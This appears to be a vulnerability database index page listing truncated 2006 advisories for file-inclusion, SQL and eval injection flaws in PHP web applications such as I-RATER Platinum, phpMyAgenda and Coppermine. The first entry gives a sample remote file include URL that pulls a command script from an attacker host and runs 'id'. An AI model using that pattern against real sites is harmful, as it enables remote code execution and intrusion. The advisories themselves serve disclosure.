[Kurdish Secure Advisory #1] I-RATER Platinum "Admin/configsettings.tpl.php" Remote File Include Vulnerability

Website : http://www.i-rater.com Risk : High Class : Remote References : http://www.securityfocus.com/bid/17623 Credits : B3g0k,Nistiman,Flot,Netqurd and all my friend Remote Code : http://www.site.com/admin/configsettings.tpl.php?includepath=http://www.evilrox.com/cmd.txt?&cmd=id...

[Kurdish Security #2] Artmedic Event Remote File Include Vulnerability

Original Advisory : http://kurdishsecurity.blogspot.com/2006/04/artmedic-event-remote-file-include.html Artmedic Event Remote File Include Vulnerability Website : http://www.artmedic.de/ Script : Artmedic Event Script Risk : High Class : Remote Greetz : B3g0k,Nistiman,Flot,Netqurd etc.. d0rk :...

phpMyAgenda-3.0.txt

MajorSecurity phpMyAgenda 3.0 Final - Remote File Include Vulnerability -------------------------------------------------------- Software: phpMyAgenda Version: 3.0 Final Type: Remote File Include Vulnerability Date: April, 24th 2006 Vendor: phpMyAgenda Page: http://phpmyagenda.com Risc: High...

Sql injection

Eval injection vulnerability in index.php in ClanSys 1.1 allows remote attackers to execute arbitrary PHP code via PHP code in the page parameter, as demonstrated by using an "include" statement that is injected into the eval statement. NOTE: this issue has been described as file inclusion by som...

[MajorSecurity] phpMyAgenda 3.0 Final - Remote File Include Vulnerability

MajorSecurity phpMyAgenda 3.0 Final - Remote File Include Vulnerability -------------------------------------------------------- Software: phpMyAgenda Version: 3.0 Final Type: Remote File Include Vulnerability Date: April, 24th 2006 Vendor: phpMyAgenda Page: http://phpmyagenda.com Risc: High...

[MajorSecurity] TotalCalendar 2.30 - Remote File Include Vulnerability

MajorSecurity TotalCalendar 2.30 - Remote File Include Vulnerability -------------------------------------------------------- Software: TotalCalendar Version: 2.30 Type: Remote File Include Vulnerability Date: April, 23th 2006 Vendor: SweetPHP Page: http://sweetphp.com Risc: High Credits:...

Sql injection

SQL injection vulnerability in index.php in PMTool 1.2.2 allows remote attackers to execute arbitrary SQL commands via the order parameter in the include files 1 user.inc.php, 2 customer.inc.php, and 3 project.inc.php. NOTE: the provenance of this information is unknown; the details are obtained...

I-RATER Platinum - Common.php Remote File Inclusion

I-RATER Platinum - Common.php Remote File Inclusion source: https://www.securityfocus.com/bid/17623/info I-RATER Platinum is prone to a remote file-include vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. An attacker can exploit this issue...

I-RATER Platinum - 'Common.php' Remote File Inclusion

source: https://www.securityfocus.com/bid/17623/info I-RATER Platinum is prone to a remote file-include vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. An attacker can exploit this issue to include an arbitrary remote file containing...

[MajorSecurity]ActualAnalyzer - Remote File Include Vulnerability

MajorSecurityActualAnalyzer - Remote File Include Vulnerability ----------------------------------------------------------- Software: ActualAnalyzer Type: Remote File Include Vulnerability Date: April, 19th 2006 Vendor: ActualScripts Page: http://actualscripts.com Risc: High Credits:...

Blursoft Blur6ex 0.3.462 - index.php Local File Inclusion

Blursoft Blur6ex 0.3.462 - index.php Local File Inclusion source: https://www.securityfocus.com/bid/17554/info Blur6ex is prone to a local file-include vulnerability that may allow an unauthorized user to view files and to execute local scripts...

phpWebFTP index.php language Parameter Local File Inclusion

The remote host is running phpWebFTP, a web-based FTP client written in PHP. The version of phpWebFTP installed on the remote host fails to sanitize user-supplied input to the 'language' parameter of the 'index.php' script before using it in a PHP 'include' function. An unauthenticated attacker m...

Coppermine 1.4.4 - 'index.php' Local File Inclusion

source: https://www.securityfocus.com/bid/17570/info Coppermine is prone to a local file-include vulnerability. This may allow unauthorized users to view files and to execute local scripts. Version 1.4.4 is vulnerable to this issue; other versions may also be affected...

PAJAX < 0.5.2 Multiple Vulnerabilities

The remote host is running PAJAX, a PHP library for remote asynchronous objects in JavaScript. The version of PAJAX installed on the remote host fails to validate input to the 'pajax/pajaxcalldispatcher.php' script before using it in a PHP 'eval' function. An unauthenticated attacker can exploit...

phpListPro &lt;= 2.0 - Remote File Include Vulnerability

phpListPro = 2.0 - Remote File Include Vulnerability -------------------------------------------------------- Software: phpListPro Version: =2.00 Type: Remote File Include Vulnerability Date: April, 11th 2006 Vendor: SmartISoft Page: http://smartisoft.com Risc: High Credits:...

AzDGVote - Remote File Inclusion

source: https://www.securityfocus.com/bid/17447/info AzDGVote is prone to a remote file-include vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. An attacker can exploit this issue to include an arbitrary remote file containing malicious PH...

Shopweezle 2.0 multiple vuln.

Shopweezle 2.0 multiple vuln. Vuln. discovered by : r0t Date: 9 april 2006 vendor:http://shopweezle.de/ affected versions: ShopWeezle PERSONAL ShopWeezle PROFESSIONAL ShopWeezle PROFESSIONAL+ orginal advisory: http://pridels.blogspot.com/2006/04/shopweezle-20-multiple-vuln.html Vuln. description:...

CVE-2005-4748

Technical details about CVE-2005-4748 are not publicly provided in the supplied documents; no concrete vulnerabilities, affected versions, or fixes are described. Monitor for updates.

MediaSlash Gallery - &#039;index.php&#039; Remote File Inclusion

source: https://www.securityfocus.com/bid/17323/info MediaSlash Gallery is prone to a remote file-include vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. An attacker can exploit this issue to include an arbitrary remote file containing...

Code injection

TWiki 4.0, 4.0.1, and 20010901 through 20040904 allows remote authenticated users with edit rights to cause a denial of service infinite recursion leading to CPU and memory consumption via INCLUDE by URL statements that form a loop, such as a page that includes itself...